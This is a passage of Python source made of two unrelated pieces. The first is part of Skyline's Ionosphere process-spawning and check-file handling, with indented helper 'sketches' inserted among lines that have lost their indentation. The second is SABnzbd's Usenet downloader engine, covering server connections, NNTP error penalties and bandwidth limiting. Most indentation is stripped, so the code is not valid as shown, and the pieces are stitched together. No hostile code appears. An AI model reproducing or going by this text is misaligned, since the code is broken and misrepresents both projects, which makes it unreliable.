logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(self.ionosphere_non_smtp_alerter_metrics)))
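# The loop above classifies each unique metric as an smtp alerter metric or
# not, first by regex match against every 'smtp' alert tuple and then by a
# substring fallback. A minimal standalone sketch of the same idea (the
# alert tuples and namespace prefix below are illustrative, not Skyline's
# shipped settings):
import re

def classify_alerter_metrics(unique_metrics, alerts, full_namespace='metrics.'):
    smtp_metrics = []
    non_smtp_metrics = []
    for metric_name in unique_metrics:
        base_name = metric_name.replace(full_namespace, '', 1)
        matched = False
        for alert in alerts:
            if str(alert[1]) != 'smtp':
                continue
            try:
                matched = bool(re.match(alert[0], base_name))
            except re.error:
                matched = False
            if not matched and alert[0] in base_name:
                matched = True
            if matched:
                break
        if matched:
            if base_name not in smtp_metrics:
                smtp_metrics.append(base_name)
        elif base_name not in non_smtp_metrics:
            non_smtp_metrics.append(base_name)
    return smtp_metrics, non_smtp_metrics

# Example: classify_alerter_metrics(['metrics.web01.cpu'], [('web01', 'smtp')])
# returns (['web01.cpu'], []).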
if ionosphere_job:
logger.info('processing - %s' % str(metric_var_files_sorted[0]))
function_name = 'spin_process'
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
# @added 20170112 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
# Ionosphere learn needs Redis work sets
# When a features profile is created there needs to be work added to a Redis
# set
# When a human makes a features profile, we want Ionosphere to make a
# use_full_duration_days features profile valid_learning_duration (e.g.
# 3361) later.
if learn_job:
logger.info('processing - learn work queue - %s' % str(work_queue_items))
function_name = 'spawn_learn_process'
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
now = time()
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# for i in range(1, settings.IONOSPHERE_PROCESSES + 1):
for i in range(1, ionosphere_processes + 1):
if ionosphere_job:
try:
p = Process(target=self.spin_process, args=(i, metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(ionosphere_processes),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# @added 20170113 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
if learn_job:
try:
p = Process(target=self.spawn_learn_process, args=(i, int(now)))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(ionosphere_processes),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor processes and terminate if any spin_process has run
# for too long
p_starts = time()
# @modified 20180621 - Feature #2404: Ionosphere - fluid approximation
# Increase run time to 55 seconds to allow for Min-Max scaling
# while time() - p_starts <= 20:
while time() - p_starts <= 55:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(ionosphere_processes),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to kill all %s processes' % function_name)
if ionosphere_job:
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
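# Standalone sketch of the check-file name convention handled above:
# '<timestamp>.<metric.name>.txt' splits into a timestamp and a metric name,
# and the metric name maps to a directory path by swapping '.' for '/'.
def parse_check_file_name(check_file_name):
    check_file_timestamp, metricname_txt = check_file_name.split('.', 1)
    metric_name = metricname_txt.replace('.txt', '')
    return check_file_timestamp, metric_name, metric_name.replace('.', '/')

# Example: parse_check_file_name('1506048000.stats.web01.cpu.txt')
# -> ('1506048000', 'stats.web01.cpu', 'stats/web01/cpu')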
for p in pids:
if p.is_alive():
logger.info('stopping %s - %s' % (function_name, str(p.is_alive())))
p.join()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Reset added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
self.ionosphere_smtp_alerter_metrics[:] = []
self.ionosphere_non_smtp_alerter_metrics[:] = []
|
downloader.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2021 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.downloader - download engine
"""
import time
import select
import logging
from math import ceil
from threading import Thread, RLock
from nntplib import NNTPPermanentError
import socket
import random
import sys
import ssl
from typing import List, Dict, Optional, Union
import sabnzbd
from sabnzbd.decorators import synchronized, NzbQueueLocker, DOWNLOADER_CV
from sabnzbd.newswrapper import NewsWrapper
import sabnzbd.notifier
import sabnzbd.config as config
import sabnzbd.cfg as cfg
from sabnzbd.misc import from_units, nntp_to_msg, int_conv, get_server_addrinfo
from sabnzbd.utils.happyeyeballs import happyeyeballs
# Timeout penalty in minutes for each cause
_PENALTY_UNKNOWN = 3 # Unknown cause
_PENALTY_502 = 5 # Unknown 502
_PENALTY_TIMEOUT = 10 # Server doesn't give an answer (multiple times)
_PENALTY_SHARE = 10 # Account sharing detected
_PENALTY_TOOMANY = 10 # Too many connections
_PENALTY_PERM = 10 # Permanent error, like bad username/password
_PENALTY_SHORT = 1 # Minimal penalty when no_penalties is set
_PENALTY_VERYSHORT = 0.1 # Error 400 without cause clues
# Wait this many seconds between checking idle servers for new articles or busy threads for timeout
_SERVER_CHECK_DELAY = 0.5
# Wait this many seconds between updates of the BPSMeter
_BPSMETER_UPDATE_DELAY = 0.05
TIMER_LOCK = RLock()
class Server:
# Pre-define attributes to save memory and improve get/set performance
__slots__ = (
"id",
"newid",
"restart",
"displayname",
"host",
"port",
"timeout",
"threads",
"priority",
"ssl",
"ssl_verify",
"ssl_ciphers",
"ssl_context",
"required",
"optional",
"retention",
"send_group",
"username",
"password",
"busy_threads",
"next_busy_threads_check",
"idle_threads",
"next_article_search",
"active",
"bad_cons",
"errormsg",
"warning",
"info",
"ssl_info",
"request",
"have_body",
"have_stat",
"article_queue",
)
def __init__(
self,
server_id,
displayname,
host,
port,
timeout,
threads,
priority,
use_ssl,
ssl_verify,
ssl_ciphers,
send_group,
username=None,
password=None,
required=False,
optional=False,
retention=0,
):
self.id: str = server_id
self.newid: Optional[str] = None
self.restart: bool = False
self.displayname: str = displayname
self.host: str = host
self.port: int = port
self.timeout: int = timeout
self.threads: int = threads
self.priority: int = priority
self.ssl: bool = use_ssl
self.ssl_verify: int = ssl_verify
self.ssl_ciphers: str = ssl_ciphers
self.ssl_context: Optional[ssl.SSLContext] = None
self.required: bool = required
self.optional: bool = optional
self.retention: int = retention
self.send_group: bool = send_group
self.username: Optional[str] = username
self.password: Optional[str] = password
self.busy_threads: List[NewsWrapper] = []
self.next_busy_threads_check: float = 0
self.idle_threads: List[NewsWrapper] = []
self.next_article_search: float = 0
self.active: bool = True
self.bad_cons: int = 0
self.errormsg: str = ""
self.warning: str = ""
self.info: Optional[List] = None # Will hold getaddrinfo() list
self.ssl_info: str = "" # Will hold the type and cipher of SSL connection
self.request: bool = False # True if a getaddrinfo() request is pending
self.have_body: bool = True # Assume server has "BODY", until proven otherwise
self.have_stat: bool = True # Assume server has "STAT", until proven otherwise
self.article_queue: List[sabnzbd.nzbstuff.Article] = []
# Initialize threads
for i in range(threads):
self.idle_threads.append(NewsWrapper(self, i + 1))
# Tell the BPSMeter about this server
sabnzbd.BPSMeter.init_server_stats(self.id)
@property
def hostip(self) -> str:
"""In case a server still has active connections, we use the same IP again
If new connection then based on value of load_balancing() and self.info:
0 - return the first entry, so all threads use the same IP
1 - and self.info has more than 1 entry (read: IP address): Return a random entry from the possible IPs
2 - and self.info has more than 1 entry (read: IP address): Return the quickest IP based on the happyeyeballs algorithm
In case of problems: return the host name itself
"""
# Check if already a successful ongoing connection
if self.busy_threads and self.busy_threads[0].nntp:
# Re-use that IP
logging.debug("%s: Re-using address %s", self.host, self.busy_threads[0].nntp.host)
return self.busy_threads[0].nntp.host
# Determine IP
ip = self.host
if self.info:
if cfg.load_balancing() == 0 or len(self.info) == 1:
# Just return the first one, so all next threads use the same IP
ip = self.info[0][4][0]
logging.debug("%s: Connecting to address %s", self.host, ip)
elif cfg.load_balancing() == 1:
# Return a random entry from the possible IPs
rnd = random.randint(0, len(self.info) - 1)
ip = self.info[rnd][4][0]
logging.debug("%s: Connecting to address %s", self.host, ip)
elif cfg.load_balancing() == 2:
# RFC6555 / Happy Eyeballs:
ip = happyeyeballs(self.host, port=self.port, use_ssl=self.ssl)
if ip:
logging.debug("%s: Connecting to address %s", self.host, ip)
else:
# nothing returned, so there was a connection problem
logging.debug("%s: No successful IP connection was possible", self.host)
return ip
def deactivate(self):
"""Deactive server and reset queued articles"""
self.active = False
self.reset_article_queue()
def stop(self):
"""Remove all connections from server"""
for nw in self.idle_threads:
sabnzbd.Downloader.remove_socket(nw)
nw.hard_reset(send_quit=True)
self.idle_threads = []
def request_info(self):
"""Launch async request to resolve server address.
getaddrinfo() can be very slow. In some situations this can lead
to delayed starts and timeouts on connections.
Because of this, the results will be cached in the server object."""
if not self.request:
self.request = True
Thread(target=self._request_info_internal).start()
def reset_article_queue(self):
logging.debug("Resetting article queue for %s", self)
for article in self.article_queue:
sabnzbd.NzbQueue.reset_try_lists(article, remove_fetcher_from_trylist=False)
self.article_queue = []
def _request_info_internal(self):
"""Async attempt to run getaddrinfo() for specified server"""
logging.debug("Retrieving server address information for %s", self.host)
self.info = get_server_addrinfo(self.host, self.port)
if not self.info:
self.bad_cons += self.threads
else:
self.bad_cons = 0
self.request = False
sabnzbd.Downloader.wakeup()
def __repr__(self):
return "<Server: %s:%s>" % (self.host, self.port)
class Downloader(Thread):
"""Singleton Downloader Thread"""
# Improves get/set performance, even though it's inherited from Thread
# Due to the huge number of get-calls in run(), it can actually make a difference
__slots__ = (
"paused",
"bandwidth_limit",
"bandwidth_perc",
"sleep_time",
"paused_for_postproc",
"shutdown",
"server_restarts",
"force_disconnect",
"read_fds",
"servers",
"timers",
)
def __init__(self, paused=False):
super().__init__()
logging.debug("Initializing downloader")
# Used for scheduled pausing
self.paused: bool = paused
# Used for reducing speed
self.bandwidth_limit: int = 0
self.bandwidth_perc: int = 0
cfg.bandwidth_perc.callback(self.speed_set)
cfg.bandwidth_max.callback(self.speed_set)
self.speed_set()
# Used to see if we can add a slowdown to the Downloader-loop
self.sleep_time: float = 0.0
self.sleep_time_set()
cfg.downloader_sleep_time.callback(self.sleep_time_set)
self.paused_for_postproc: bool = False
self.shutdown: bool = False
# A user might change server parameters again before the server restart is ready.
# Keep a counter to prevent multiple restarts
self.server_restarts: int = 0
self.force_disconnect: bool = False
self.read_fds: Dict[int, NewsWrapper] = {}
self.servers: List[Server] = []
self.timers: Dict[str, List[float]] = {}
for server in config.get_servers():
self.init_server(None, server)
def init_server(self, oldserver: Optional[str], newserver: str):
"""Setup or re-setup single server
When oldserver is defined and in use, delay startup.
Note that the server names are "host:port" strings!
"""
create = False
servers = config.get_servers()
if newserver in servers:
srv = servers[newserver]
enabled = srv.enable()
displayname = srv.displayname()
host = srv.host()
port = srv.port()
timeout = srv.timeout()
threads = srv.connections()
priority = srv.priority()
ssl = srv.ssl()
ssl_verify = srv.ssl_verify()
ssl_ciphers = srv.ssl_ciphers()
username = srv.username()
password = srv.password()
required = srv.required()
optional = srv.optional()
retention = int(srv.retention() * 24 * 3600) # days ==> seconds
send_group = srv.send_group()
create = True
if oldserver:
for server in self.servers:
if server.id == oldserver:
# Server exists, do re-init later
create = False
server.newid = newserver
server.restart = True
server.reset_article_queue()
self.server_restarts += 1
break
if create and enabled and host and port and threads:
self.servers.append(
Server(
newserver,
displayname,
host,
port,
timeout,
threads,
priority,
ssl,
ssl_verify,
ssl_ciphers,
send_group,
username,
password,
required,
optional,
retention,
)
)
# Sort the servers for performance
self.servers.sort(key=lambda svr: "%02d%s" % (svr.priority, svr.displayname.lower()))
def add_socket(self, fileno: int, nw: NewsWrapper):
"""Add a socket ready to be used to the list to be watched"""
self.read_fds[fileno] = nw
def remove_socket(self, nw: NewsWrapper):
"""Remove a socket to be watched"""
if nw.nntp:
self.read_fds.pop(nw.nntp.fileno, None)
@NzbQueueLocker
def set_paused_state(self, state: bool):
"""Set downloader to specified paused state"""
self.paused = state
@NzbQueueLocker
def resume(self):
# Do not notify when SABnzbd is still starting
if self.paused and sabnzbd.WEB_DIR:
logging.info("Resuming")
sabnzbd.notifier.send_notification("SABnzbd", T("Resuming"), "pause_resume")
self.paused = False
@NzbQueueLocker
def pause(self):
"""Pause the downloader, optionally saving admin"""
if not self.paused:
self.paused = True
logging.info("Pausing")
sabnzbd.notifier.send_notification("SABnzbd", T("Paused"), "pause_resume")
if self.is_paused():
sabnzbd.BPSMeter.reset()
if cfg.autodisconnect():
self.disconnect()
def wait_for_postproc(self):
logging.info("Waiting for post-processing to finish")
self.paused_for_postproc = True
@NzbQueueLocker
def resume_from_postproc(self):
logging.info("Post-processing finished, resuming download")
self.paused_for_postproc = False
@NzbQueueLocker
def disconnect(self):
logging.info("Forcing disconnect")
self.force_disconnect = True
def limit_speed(self, value: Union[str, int]):
"""Set the actual download speed in Bytes/sec
When 'value' ends with a '%' sign or is within 1-100, it is interpreted as a percentage of the maximum bandwidth.
When no '%' is found, it is interpreted as an absolute speed (including KMGT notation).
A standalone sketch of this interpretation follows this method.
"""
if value:
mx = cfg.bandwidth_max.get_int()
if "%" in str(value) or (0 < from_units(value) < 101):
limit = value.strip(" %")
self.bandwidth_perc = from_units(limit)
if mx:
self.bandwidth_limit = mx * self.bandwidth_perc / 100
else:
logging.warning_helpful(T("You must set a maximum bandwidth before you can set a bandwidth limit"))
else:
self.bandwidth_limit = from_units(value)
if mx:
self.bandwidth_perc = self.bandwidth_limit / mx * 100
else:
self.bandwidth_perc = 100
else:
self.speed_set()
logging.info("Speed limit set to %s B/s", self.bandwidth_limit)
def get_limit(self):
return self.bandwidth_perc
def get_limit_abs(self):
return self.bandwidth_limit
def speed_set(self):
limit = cfg.bandwidth_max.get_int()
perc = cfg.bandwidth_perc()
if limit and perc:
self.bandwidth_perc = perc
self.bandwidth_limit = limit * perc / 100
else:
self.bandwidth_perc = 0
self.bandwidth_limit = 0
def sleep_time_set(self):
self.sleep_time = cfg.downloader_sleep_time() * 0.0001
logging.debug("Sleep time: %f seconds", self.sleep_time)
def is_paused(self):
if not self.paused:
return False
else:
if sabnzbd.NzbQueue.has_forced_items():
return False
else:
return True
def highest_server(self, me: Server):
"""Return True when this server has the highest priority of the active ones
0 is the highest priority
"""
for server in self.servers:
if server is not me and server.active and server.priority < me.priority:
return False
return True
def nzo_servers(self, nzo):
return list(filter(nzo.server_in_try_list, self.servers))
def maybe_block_server(self, server: Server):
# Was it resolving problem?
if server.info is False:
# Warn about resolving issues
errormsg = T("Cannot connect to server %s [%s]") % (server.host, T("Server name does not resolve"))
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(errormsg)
if not server.required:
logging.warning(T("Server %s will be ignored for %s minutes"), server.host, _PENALTY_TIMEOUT)
# Not fully the same as the code below for optional servers
server.bad_cons = 0
if server.required:
sabnzbd.Scheduler.plan_required_server_resume()
else:
server.deactivate()
self.plan_server(server, _PENALTY_TIMEOUT)
# Optional and active server had too many problems.
# Disable it now and send a re-enable plan to the scheduler
if server.optional and server.active and (server.bad_cons / server.threads) > 3:
# Deactivate server
server.bad_cons = 0
server.deactivate()
logging.warning(T("Server %s will be ignored for %s minutes"), server.host, _PENALTY_TIMEOUT)
self.plan_server(server, _PENALTY_TIMEOUT)
# Remove all connections to server
for nw in server.idle_threads + server.busy_threads:
self.__reset_nw(nw, "forcing disconnect", warn=False, wait=False, retry_article=False, send_quit=False)
# Make sure server address resolution is refreshed
server.info = None
def decode(self, article, raw_data: Optional[List[bytes]]):
"""Decode article and check the status of
the decoder and the assembler
"""
# Article was requested and fetched, update article stats for the server
sabnzbd.BPSMeter.register_server_article_tried(article.fetcher.id)
# Handle broken articles directly
if not raw_data:
if not article.search_new_server():
sabnzbd.NzbQueue.register_article(article, success=False)
article.nzf.nzo.increase_bad_articles_counter("missing_articles")
return
# Send to decoder-queue
sabnzbd.Decoder.process(article, raw_data)
# See if we need to delay because the queues are full
logged = False
while not self.shutdown and (sabnzbd.Decoder.queue_full() or sabnzbd.Assembler.queue_full()):
if not logged:
# Only log once, to not waste any CPU-cycles
logging.debug(
"Delaying - Decoder queue: %s - Assembler queue: %s",
sabnzbd.Decoder.decoder_queue.qsize(),
sabnzbd.Assembler.queue.qsize(),
)
logged = True
time.sleep(0.01)
def run(self):
# First check IPv6 connectivity
sabnzbd.EXTERNAL_IPV6 = sabnzbd.test_ipv6()
logging.debug("External IPv6 test result: %s", sabnzbd.EXTERNAL_IPV6)
# Then we check SSL certificate checking
sabnzbd.CERTIFICATE_VALIDATION = sabnzbd.test_cert_checking()
logging.debug("SSL verification test: %s", sabnzbd.CERTIFICATE_VALIDATION)
# Kick BPS-Meter to check quota
BPSMeter = sabnzbd.BPSMeter
BPSMeter.update()
next_bpsmeter_update = 0
# can_be_slowed variables
can_be_slowed: Optional[float] = None
can_be_slowed_timer: float = 0.0
next_stable_speed_check: float = 0.0
# Check server expiration dates
check_server_expiration()
while 1:
now = time.time()
# Set Article to None so references from this
# thread do not keep the parent objects alive (see #1628)
article = None
for server in self.servers:
# Skip this server if there's no point searching for new stuff to do
if not server.busy_threads and server.next_article_search > now:
continue
if server.next_busy_threads_check < now:
server.next_busy_threads_check = now + _SERVER_CHECK_DELAY
for nw in server.busy_threads[:]:
if (nw.nntp and nw.nntp.error_msg) or (nw.timeout and now > nw.timeout):
if nw.nntp and nw.nntp.error_msg:
# Already showed error
self.__reset_nw(nw)
else:
self.__reset_nw(nw, "timed out", warn=True)
server.bad_cons += 1
self.maybe_block_server(server)
if server.restart:
if not server.busy_threads:
newid = server.newid
server.stop()
self.servers.remove(server)
if newid:
self.init_server(None, newid)
self.server_restarts -= 1
# Have to leave this loop, because we removed element
break
else:
# Restart pending, don't add new articles
continue
if (
not server.idle_threads
or self.is_paused()
or self.shutdown
or self.paused_for_postproc
or not server.active
):
continue
for nw in server.idle_threads[:]:
if nw.timeout:
if now < nw.timeout:
continue
else:
nw.timeout = None
if not server.info:
# Only request info if there's stuff in the queue
if not sabnzbd.NzbQueue.is_empty():
self.maybe_block_server(server)
server.request_info()
break
# Get article from pre-fetched ones or fetch new ones
if server.article_queue:
article = server.article_queue.pop(0)
else:
# Pre-fetch new articles
server.article_queue = sabnzbd.NzbQueue.get_articles(
server, self.servers, max(1, server.threads // 4)
)
if server.article_queue:
article = server.article_queue.pop(0)
# Mark expired articles as tried on this server
if server.retention and article.nzf.nzo.avg_stamp < now - server.retention:
self.decode(article, None)
while server.article_queue:
self.decode(server.article_queue.pop(), None)
# Move to the next server, allowing the next server to already start
# fetching the articles that were too old for this server
break
else:
# Skip this server for a short time
server.next_article_search = now + _SERVER_CHECK_DELAY
break
server.idle_threads.remove(nw)
server.busy_threads.append(nw)
nw.article = article
if nw.connected:
self.__request_article(nw)
else:
try:
logging.info("%s@%s: Initiating connection", nw.thrdnum, server.host)
nw.init_connect()
except:
logging.error(
T("Failed to initialize %s@%s with reason: %s"),
nw.thrdnum,
server.host,
sys.exc_info()[1],
)
self.__reset_nw(nw, "failed to initialize", warn=True)
if self.force_disconnect or self.shutdown:
for server in self.servers:
for nw in server.idle_threads + server.busy_threads:
# Send goodbye if we have open socket
if nw.nntp:
self.__reset_nw(
nw, "forcing disconnect", wait=False, count_article_try=False, send_quit=True
)
# Make sure server address resolution is refreshed
server.info = None
server.reset_article_queue()
self.force_disconnect = False
# Make sure we update the stats
BPSMeter.update()
# Exit-point
if self.shutdown:
logging.info("Shutting down")
break
# Use select to find sockets ready for reading/writing
readkeys = self.read_fds.keys()
if readkeys:
read, _, _ = select.select(readkeys, (), (), 1.0)
# Add a sleep if there are too few results compared to the number of active connections
if self.sleep_time:
if can_be_slowed and len(read) < 1 + len(readkeys) / 10:
time.sleep(self.sleep_time)
# Initialize by waiting for stable speed and then enable sleep
if can_be_slowed is None or can_be_slowed_timer:
# Wait for stable speed to start testing
if not can_be_slowed_timer and now > next_stable_speed_check:
if BPSMeter.get_stable_speed(timespan=10):
can_be_slowed_timer = now + 8
can_be_slowed = 1
else:
next_stable_speed_check = now + _BPSMETER_UPDATE_DELAY
# Check 10 seconds after enabling slowdown
if can_be_slowed_timer and now > can_be_slowed_timer:
# Now let's check if it was stable in the last 10 seconds
can_be_slowed = BPSMeter.get_stable_speed(timespan=10)
can_be_slowed_timer = 0
if not can_be_slowed:
self.sleep_time = 0
logging.debug("Downloader-slowdown: %r", can_be_slowed)
else:
read = []
BPSMeter.reset()
time.sleep(1.0)
with DOWNLOADER_CV:
while (
(sabnzbd.NzbQueue.is_empty() or self.is_paused() or self.paused_for_postproc)
and not self.shutdown
and not self.force_disconnect
and not self.server_restarts
):
DOWNLOADER_CV.wait()
if now > next_bpsmeter_update:
BPSMeter.update()
next_bpsmeter_update = now + _BPSMETER_UPDATE_DELAY
if not read:
continue
for selected in read:
nw = self.read_fds[selected]
article = nw.article
server = nw.server
try:
bytes_received, done, skip = nw.recv_chunk()
except:
bytes_received, done, skip = (0, False, False)
if skip:
continue
if bytes_received < 1:
self.__reset_nw(nw, "server closed connection", wait=False)
continue
else:
try:
article.nzf.nzo.update_download_stats(BPSMeter.bps, server.id, bytes_received)
except AttributeError:
# In case nzf has disappeared because the file was deleted before the update could happen
pass
BPSMeter.update(server.id, bytes_received)
if self.bandwidth_limit:
if BPSMeter.bps + BPSMeter.sum_cached_amount > self.bandwidth_limit:
BPSMeter.update()
while BPSMeter.bps > self.bandwidth_limit:
time.sleep(0.01)
BPSMeter.update()
if nw.status_code != 222 and not done:
if not nw.connected or nw.status_code == 480:
try:
nw.finish_connect(nw.status_code)
if sabnzbd.LOG_ALL:
logging.debug(
"%s@%s last message -> %s", nw.thrdnum, nw.server.host, nntp_to_msg(nw.data)
)
nw.clear_data()
except NNTPPermanentError as error:
# Handle login problems
block = False
penalty = 0
msg = error.response
ecode = int_conv(msg[:3])
display_msg = " [%s]" % msg
logging.debug("Server login problem: %s, %s", ecode, msg)
if ecode in (502, 400, 481, 482) and clues_too_many(msg):
# Too many connections: remove this thread and reduce thread-setting for server
# Plan to go back to the full number after a penalty timeout
if server.active:
errormsg = T("Too many connections to server %s") % display_msg
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(T("Too many connections to server %s"), server.host)
# Don't count this for the tries (max_art_tries) on this server
self.__reset_nw(nw, send_quit=True)
self.plan_server(server, _PENALTY_TOOMANY)
server.threads -= 1
elif ecode in (502, 481, 482) and clues_too_many_ip(msg):
# Account sharing?
if server.active:
errormsg = T("Probable account sharing") + display_msg
if server.errormsg != errormsg:
server.errormsg = errormsg
name = " (%s)" % server.host
logging.warning(T("Probable account sharing") + name)
penalty = _PENALTY_SHARE
block = True
elif ecode in (452, 481, 482, 381) or (ecode == 502 and clues_login(msg)):
# Cannot login, block this server
if server.active:
errormsg = T("Failed login for server %s") % display_msg
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.error(T("Failed login for server %s"), server.host)
penalty = _PENALTY_PERM
block = True
elif ecode in (502, 482):
# Cannot connect (other reasons), block this server
if server.active:
errormsg = T("Cannot connect to server %s [%s]") % ("", display_msg)
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(T("Cannot connect to server %s [%s]"), server.host, msg)
if clues_pay(msg):
penalty = _PENALTY_PERM
else:
penalty = _PENALTY_502
block = True
elif ecode == 400:
# Temp connection problem?
if server.active:
logging.debug("Unspecified error 400 from server %s", server.host)
penalty = _PENALTY_VERYSHORT
block = True
else:
# Unknown error, just keep trying
if server.active:
errormsg = T("Cannot connect to server %s [%s]") % ("", display_msg)
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(T("Cannot connect to server %s [%s]"), server.host, msg)
penalty = _PENALTY_UNKNOWN
block = True
if block or (penalty and server.optional):
retry_article = False
if server.active:
if server.required:
sabnzbd.Scheduler.plan_required_server_resume()
retry_article = True
else:
server.deactivate()
if penalty and (block or server.optional):
self.plan_server(server, penalty)
# Note that the article is discarded for this server if the server is not required
self.__reset_nw(nw, retry_article=retry_article, send_quit=True)
continue
except:
logging.error(
T("Connecting %s@%s failed, message=%s"),
nw.thrdnum,
nw.server.host,
nntp_to_msg(nw.data),
)
# No reset-warning needed, above logging is sufficient
self.__reset_nw(nw, retry_article=False)
if nw.connected:
logging.info("Connecting %s@%s finished", nw.thrdnum, nw.server.host)
self.__request_article(nw)
elif nw.status_code == 223:
done = True
logging.debug("Article <%s> is present", article.article)
elif nw.status_code == 211:
logging.debug("group command ok -> %s", nntp_to_msg(nw.data))
nw.group = nw.article.nzf.nzo.group
nw.clear_data()
self.__request_article(nw)
elif nw.status_code in (411, 423, 430):
done = True
logging.debug(
"Thread %s@%s: Article %s missing (error=%s)",
nw.thrdnum,
nw.server.host,
article.article,
nw.status_code,
)
nw.clear_data()
elif nw.status_code == 500:
if article.nzf.nzo.precheck:
# Assume "STAT" command is not supported
server.have_stat = False
logging.debug("Server %s does not support STAT", server.host)
else:
# Assume "BODY" command is not supported
server.have_body = False
logging.debug("Server %s does not support BODY", server.host)
nw.clear_data()
self.__request_article(nw)
if done:
# Successful data, clear "bad" counter
server.bad_cons = 0
server.errormsg = server.warning = ""
if sabnzbd.LOG_ALL:
logging.debug("Thread %s@%s: %s done", nw.thrdnum, server.host, article.article)
self.decode(article, nw.data)
# Reset connection for new activity
nw.soft_reset()
server.busy_threads.remove(nw)
server.idle_threads.append(nw)
self.remove_socket(nw)
def __reset_nw(
self,
nw: NewsWrapper,
reset_msg: Optional[str] = None,
warn: bool = False,
wait: bool = True,
count_article_try: bool = True,
retry_article: bool = True,
send_quit: bool = False,
):
# Some warnings are errors, and not added as server.warning
if warn and reset_msg:
nw.server.warning = reset_msg
logging.info("Thread %s@%s: %s", nw.thrdnum, nw.server.host, reset_msg)
elif reset_msg:
logging.debug("Thread %s@%s: %s", nw.thrdnum, nw.server.host, reset_msg)
# Make sure this NewsWrapper is in the idle threads
if nw in nw.server.busy_threads:
nw.server.busy_threads.remove(nw)
if nw not in nw.server.idle_threads:
nw.server.idle_threads.append(nw)
# Make sure it is not in the readable sockets
self.remove_socket(nw)
if nw.article:
# Only some errors should count towards the total tries for each server
if count_article_try:
nw.article.tries += 1
# Do we discard, or try again for this server
if not retry_article or nw.article.tries > cfg.max_art_tries():
# Too many tries on this server, consider article missing
self.decode(nw.article, None)
nw.article.tries = 0
else:
# Retry again with the same server
logging.debug(
"Re-adding article %s from %s to server %s",
nw.article.article,
nw.article.nzf.filename,
nw.article.fetcher,
)
nw.article.fetcher.article_queue.append(nw.article)
# Reset connection object
nw.hard_reset(wait, send_quit=send_quit)
# Empty SSL info, it might change on next connect
nw.server.ssl_info = ""
def __request_article(self, nw: NewsWrapper):
try:
nzo = nw.article.nzf.nzo
if nw.server.send_group and nzo.group != nw.group:
group = nzo.group
if sabnzbd.LOG_ALL:
logging.debug("Thread %s@%s: GROUP <%s>", nw.thrdnum, nw.server.host, group)
nw.send_group(group)
else:
if sabnzbd.LOG_ALL:
logging.debug("Thread %s@%s: BODY %s", nw.thrdnum, nw.server.host, nw.article.article)
nw.body()
# Mark as ready to be read
self.read_fds[nw.nntp.fileno] = nw
except socket.error as err:
logging.info("Looks like server closed connection: %s", err)
self.__reset_nw(nw, "server broke off connection", warn=True, send_quit=False)
except:
logging.error(T("Suspect error in downloader"))
logging.info("Traceback: ", exc_info=True)
self.__reset_nw(nw, "server broke off connection", warn=True, send_quit=False)
# ------------------------------------------------------------------------------
# Timed restart of servers admin.
# For each server all planned events are kept in a list.
# When the first timer of a server fires, all other existing timers
# are neutralized.
